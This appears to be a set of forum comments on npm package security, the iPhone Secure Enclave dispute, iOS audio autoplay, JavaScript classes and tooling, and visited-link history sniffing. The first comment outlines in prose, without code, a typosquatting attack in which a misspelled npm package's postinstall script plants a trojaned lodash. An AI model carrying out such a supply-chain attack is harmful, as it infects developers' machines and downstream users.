I've not tried this, but a similar but easier exploit would be to register packages with names that are close to existing popular package names, and then have a post install script inject a modified version of the actual package into the node_modules directory that also does something malicious. So you register the "lodasj" package instead of "lodash" and than create a post install script to inject the malicious "lodash" package that re-exports all of the lodash API + does something nasty. If someone has a typo with "npm i lodasj" and doesn't notice the mistake, the machine that installs it and anyone that depends on the package is infected. I wonder how well policed NPM is against these kinds of malware attacks.
You can inject a version of whatever you want into the node_modules folder in the post install script though can't you? So you just copy your own malicious lodash into node_modules. I haven't tried it but I think it'd work.
The only statement I could find from Apple was from the iOS security guide that states, "it utilizes its own secure boot and personalized software update separate from the application processor." I think we can both agree that's a pretty vague statement, if you have a better source I'd like to see it.
"The executives — speaking on background — also explicitly stated that what the FBI is asking for — for it to create a piece of software that allows a brute force password crack to be performed — would also work on newer iPhones with its Secure Enclave chip"
I understand that the boot chain is the only way Apple may modify the behaviour of the Enclave but how would the update be forced? DFU wipes the class key, making any attempt at trying to brute force the phone, useless. If debug pinout access is available, then why does FBI needs Apple to access the phone at all?
I think the confusion stems from the iOS security guide that Apple published. Page 7 of the guide states that "The Secure Enclave is a coprocessor fabricated in the Apple A7 or later A-series processor. It utilizes its own secure boot and personalized software update separate from the application processor," which implies that somehow updating it is more secure, without saying exactly how much control Apple has over updating it, and whether or not the phone needs to be unlocked before it accepts new firmware. Given that they haven't come out and said that they can't override the firmware for locked phones, I'd say they can. Although, before Apple's recent statements I would have assumed that they couldn't, so the confusions understandable. The guides at https://www.apple.com/business/docs/iOS_Security_Guide.pdf
I agree but I wish they would have added a permissions dialog instead of outright blocking. If a site injects an autoplay audio tag iOS could prompt you once if that behaviour is OK or not for that particular domain. Apples creative interpretation of standards is pretty annoying to me as both a user and a developer, sometimes auto playing audio is actually wanted, in games for instance.
Moreover I think the whole "let the user decide" attitude is just a lame excuse developers hide behind when they can't figure out a decent UX. (It's no wonder design-by-committee software like we see on desktop Linux has so many UI options... Nobody can come up with anything people can agree on so "make it a checkbox so the user can decide" becomes the solution.)
Unsolicited sound is a horrible idea on any platform, it's a good thing that iOS only allows it when there's a touch event somewhere in the call stack. Dialogs would only worsen the problem; disallowing it altogether is the only sane solution.
Developers do lean on users too much to solve UX problems, but I still maintain that giving users a choice here would have been the better alternative. Access to device sensors are almost always behind some kind of permissions dialog on major platforms. Personally I like web/iOS model best, it prompts me when an app/site wants to use my microphone, gps, camera, etc, and then remembers the choice I've made. Making potentially invasive or offensive application behaviour completely transparent to the user is a good user experience in my book, and it discourages developers from using those sensors unless they actually need them. Although I can concede that getting permission for unsolicited access to the phones speaker might be going to far from the small sample size here, and I am just as annoyed at the recent auto playing video trend on the web as anyone else.
Unsolicited sound is pretty important for games, and increasingly the web is becoming a pretty good platform for them. I wrote a little game a while back and I worked around the sound issue in Safari by initializing my sounds (just a few) on the users first tap, not a back breaking workaround or anything, but still annoying that I had to work around Safari. Here's the thing though, if I hadn't been testing on iOS a critical (the sound actually was) part of my game would have been broken on iOS. I guess I'm just grumpy about that... :-/
Is his entire complaint that the syntax looks too much like Java? The fact is, people are already using prototypes to share common methods across objects, and classes are really nice short syntactic sugar for doing that. His comment on classes there is too flippant to even know the meaning of his complaint.
Beyond that I'd argue that classes give you more guarantees about how an object will behave at the expense of flexibility, although they give you escape hatches if you like. The reduced flexibility is really nice because you can define safe subsets of the language in which tools that analyze and refactor code are possible, even across files if you're using the module system. Moving the language in a direction where consistent universal tooling is possible to write is something that I love about classes, and is often overlooked in discussions about it. I don't care that classes are just a simplified subset feature of what's possible using prototypes, it covers the common case well enough and makes it possible to write really nice code completetion and refactoring tools that don't randomly break. That's worth all the extra magic in my opinion.
People do weird metaprogramming things with the existing constructs. In a lot of cases it's because people prefer to keep things DRY, but it hurts when you're trying to grep through a large codebase to find that one method you need. A contrived example:
It's impossible to statically infer what methods are being declared in ES5 code in general. You can pick up on some common assignment patterns, but not all the weird stuff people do. Just check out the top 10 NPM modules and I guarantee you'll find some odd assignment patterns. I can remember that the "colors" module did meta stuff when I last checked. You can't just easily run the code to find out what the module is exporting either, because of potential side effects from IO. You can wrap Node's core IO modules, but that solution is specific to Node, and still won't cover every possible case. In short, it's a huge pain to write tools to pull information out of Javascript code in general, and that hurts the tooling ecosystem around Javascript.
With the class pattern you at least have some staticly inferable information you're sure you can pull out of the class, and weird stuff is discouraged. I know in some ways that this is a weak argument, because of the new square bracket assignment, and the fact that anyone can muck with the prototype of the class after it's created. Even still, for the simple OLOO case it does encourage people to write code that has method names that can easily be staticly inferred, and that's a good thing for JS tooling possibilities.
I really just want omnicompletion that doesn't randomly break on me! The OLOO pattern is one that's incredibly common in JS
Do you have an example of this working? I thought that browser venders we're having the :visited selector lie to you when you call getComputedStyle on them? Also, how would you workaround the need for JS? I understand that you can do something similiar with tracking pixels, but I'm under the impression that Ghostery blocks them.
Interesting papers, thanks for calling my attention to them. They made me paranoid enough to disable the styling of visited links in Firefox to prevent the large amount of timing attacks that are possible.